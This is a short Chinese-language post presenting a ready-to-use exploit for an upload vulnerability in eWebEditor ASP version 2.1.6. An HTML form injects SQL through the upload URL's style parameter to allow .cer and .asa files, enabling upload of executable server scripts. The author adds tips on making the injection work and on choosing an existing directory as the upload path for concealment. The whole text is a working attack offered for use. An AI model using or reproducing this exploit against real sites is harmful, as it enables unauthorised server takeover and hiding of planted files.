ewebeditor上传漏洞

<H3>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H3><br><br>
<form action="http://xxxx/include/wedit/upload.asp?action=save&type=IMAGE&style=standard' and 1=2 union select S_ID,S_Name,S_Dir,S_CSS,'UploadFile',S_Width,S_Height,S_Memo,S_IsSys,[S_FileExt]%2b'|cer' ,S_FlashExt,[S_ImageExt]%2b'|asa',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

 这是别人写的，我改了下，其中标红的时要注意的。

第一个地方最好加上1=2，不然实际应用中有可能union的不会被加上

第二个地方是可以自自定义上传路径的，但是一定要是存在的，可以考虑

写道

Admin
ButtonImage
CSS
db
Dialog
Example
Include
SysImage

 

这样可以有一定的隐蔽性，别的就没什么了